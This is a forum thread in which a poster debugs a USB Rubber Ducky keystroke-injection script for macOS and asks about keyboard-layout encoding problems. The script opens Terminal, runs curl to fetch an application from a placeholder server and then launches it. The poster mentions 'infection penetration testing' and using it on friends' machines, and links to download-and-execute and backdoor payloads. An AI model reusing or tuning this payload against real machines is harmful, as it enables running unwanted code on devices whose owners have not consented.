Because Mac OS X are having it too easy

[ilikepineapple]

I've recently been installing quite a couple virtual machines to try out my little duckies (nothing to say about the windows scripts, they work wonders and we have plenty of feedback on that part).

Yet, I need infection penetration testing on Mac OS X, and I can't seem to find much going on around the forums about that subject.

All I need, basically, is an understanding of their functionalities, and when I need a sudo password (like to disable Gatekeeper) or if simply being in terminal will bypass that for a simple app installation.

I'm only looking to download and execute an application downloaded from an external website, but what bugs me the most is that I can't get past the first steps. I have been using Jesse Wallace (c0deous) and Patrick Mosca's help by taking parts of their codes to make it work, and have been changing remotely the language used both by the duckencoder 2.6.3 (or whatever version it is) for canada french, english (us-french), canada english, have been also transforming the keyboard mapping inside the virtual machine itself to make sure it fitted well with the injection, but nothing worked.

Everytime I started the code

DELAY 1000
COMMAND SPACE

The space command seems to be working good at least haha, does open the top-right corner prompt

DELAY 800
STRING Terminal

Here starts the problem. Terminal comes out as something like IAELtmin, tried making a sense out of it but I really couldn't. Every language gave a different but similar output, and none was able to fix the problem.

DELAY 500
ENTER

Problem number 2 : Despite the weird wording, it doesnt even press enter at this point, because I see some recommendations from Apple being highlighted, so naturally after the first fail it should keep on going for the next, yet it doesnt, which is weird.

DELAY 500
STRING curl http://SERVER/path/to/file.app > file.app
ENTER
DELAY 2000 (give it some time to download it)
STRING open -a file
ENTER

And it keeps on writing without ever pressing the ENTER key, and mixing all the letters together.

Now I've been working with iAtkos if anyone is familiar with it, all setup good, and have worked hours and tried many different variables to make this work but the foundations itself don't wok (even the online encoder couldn't give me a good inject.bin output on the field)

So I was wondering if anyone has had these problems before, and if there is a way to fix it? Is it because it runs inside a VM and not a real Mac, and otherwise it would work? Is it simply because of an encoding/payload problem?

Also, on a sidenote, living in a french-canadian area where I have no clue which language my friends have, I was wondering if the canadian keyboard was unilateral, same for everyone, and if, whether they are writing in english or french the payload should work anyways (all with canadian keyboards, all QWERTY, simply ctrl+shift changes the key mapping from french to english).

Anyways, I'll be glad to hear from you guys soon, you seem like a great community, and this product is amazing as far as I tested it on Windows.

Thanks in advance!

-domino

[ilikepineapple]

Oh, and second question, anyone knows why the commands/GUI aren't the same in these payloads meant for the same OS?

https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payload---OS-X-Wget-and-Execute

https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payload----OSX-User-Backdoor

I tried both but the COMMAND function seemed like the one actually working on my VMs for some reason, and if manually typing Terminal in, it would be able to access it and write the rest of the payload (in total jabberish of course). What bugs me above all is the fact that the hardest part is actually acheived, yet only the smallest technical difficulty holds me back to the point where I can absolutely not do anything at all.

Best regards,

-domino

[ilikepineapple]

Update : Tried it on a Mac OS X (not a mounted version) and the commands seemed to be working perfectly, all my bad! Only problem is that it was in canadian friench, therefore the layout must be different, as in the / key is replaced by the é key, how to fix that? making another keyboard layout only for canadian friench keyboards?

[MB60893]

This seems to be a common problem. Speak with one of the ducky moderators.